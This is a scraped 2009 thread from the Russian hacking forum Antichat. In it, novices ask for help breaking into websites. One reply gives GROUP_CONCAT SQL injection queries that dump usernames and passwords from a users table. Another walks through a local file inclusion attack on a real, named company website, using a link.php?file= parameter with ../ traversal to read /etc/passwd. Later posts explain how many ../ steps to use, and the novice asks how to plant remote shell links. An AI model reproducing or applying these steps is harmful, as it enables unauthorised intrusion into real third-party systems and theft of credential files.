Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
21.01.2009, 14:46
|
|
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме:
3244717
Репутация:
1980
|
|
Сообщение от Octave_Parango
Подскажите, можно ли такое сделать.
Вывожу инфу:
group_concat(name,0x3a,pass,0x3a,city)
Выплывает это все одной большой партянкой и все слитно, то есть все записи в одной строке через двоеточие, пример:
admin:admin:belmor:root:root:belmor - ну и так далее!
вопрос:
Можно ли вывести информацию, что бы каждая записи выводилась с новой строки:
admin:admin:belmor
root:root:belmor
Thx.
SELECT GROUP_CONCAT(CONCAT(name,0x3a,pass,0x3a,city) SEPARATOR 0×0a) FROM users
SELECT GROUP_CONCAT(CONCAT(name,0x3a,pass,0x3a,city) SEPARATOR 0x3C62723E) FROM users
|
|
|
21.01.2009, 14:48
|
|
Новичок
Регистрация: 30.06.2008
Сообщений: 16
Провел на форуме:
57497
Репутация:
8
|
|
привет всем! хочу спросить по поводу php inj, прочитал много статей так и не могу реально взломать сайт..не подскажите как(что нужно) и с чего начать?
|
|
|
|
21.01.2009, 15:08
|
|
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763
Репутация:
1680
|
|
gangs, для начала уязвимость надо найти.
А раскрутить это уже второе дело.
|
|
|
|
21.01.2009, 15:16
|
|
Новичок
Регистрация: 30.06.2008
Сообщений: 16
Провел на форуме:
57497
Репутация:
8
|
|
ну давай возмём на сайте любую уязвимость...и раскрутим??
|
|
|
|
21.01.2009, 15:19
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865
Репутация:
571
|
|
Любую? Так зайди в раздел sql инъекции, вот тебе и раскрученная инъекция.
Аналогично с PHP inj.
|
|
|
|
21.01.2009, 15:22
|
|
Новичок
Регистрация: 30.06.2008
Сообщений: 16
Провел на форуме:
57497
Репутация:
8
|
|
с sql инъекциями я разобрался....и зачем мне брать уже ломаные меня интересует...самому взломать, но я не могу не получается! вот и прошу чтоб кто нить реально помог раскрутить!
взять любую php inj и раскрутить заново)
|
|
|
|
21.01.2009, 15:27
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865
Репутация:
571
|
|
Так в чем проблема-то? Если ты читал статьи?
Берём сайт.
Код:
http://vitzrotech.com
Находим "интересную" ссылку
Код:
http://vitzrotech.com/english/ourproducts/mcb/link.php?file=mcb2.htm
Пробуем:
Код:
http://vitzrotech.com/english/ourproducts/mcb/link.php?file=blablabla
Читаем /etc/passwd
Код:
http://vitzrotech.com/english/ourproducts/mcb/link.php?file=../../../../../../../../etc/passwd
Последний раз редактировалось R1dex; 21.01.2009 в 15:46..
|
|
|
|
21.01.2009, 15:33
|
|
Новичок
Регистрация: 30.06.2008
Сообщений: 16
Провел на форуме:
57497
Репутация:
8
|
|
за это спасибо..но есть еще два вопроса....скоко надо поставить ../../../../../../../../../../ после file= , и видел по видео подставляют свои ссылки нс шеллом...что нить в этом роде не мог ли бы показать??
|
|
|
|
21.01.2009, 15:39
|
|
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874
Репутация:
1020
|
|
Сообщение от gangs
за это спасибо..но есть еще два вопроса....скоко надо поставить ../../../../../../../../../../ после file=
чем больше тем лутчше, шучу  ., /../ - подняться на 1-у дирикторию верх, смотришь скока у тебя от твоего местоположения до требуемой диры ну и ставишь необходимое количество.
|
|
|
|
21.01.2009, 15:55
|
|
Новичок
Регистрация: 30.06.2008
Сообщений: 16
Провел на форуме:
57497
Репутация:
8
|
|
Сообщение от AkyHa_MaTaTa
чем больше тем лутчше, шучу ., /../ - подняться на 1-у дирикторию верх, смотришь скока у тебя от твоего местоположения до требуемой диры ну и ставишь необходимое количество. спс и за это..понял!! а как на счет этого-- видел по видео подставляют свои ссылки нс шеллом...что нить в этом роде не мог ли бы показать??
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [Raz0r]](/avatars/avatar33548.gif){kind=avatar}
![Отправить сообщение для [Raz0r] с помощью ICQ](fusion/misc/im_icq.gif)
Похожие темы
Линейный вид
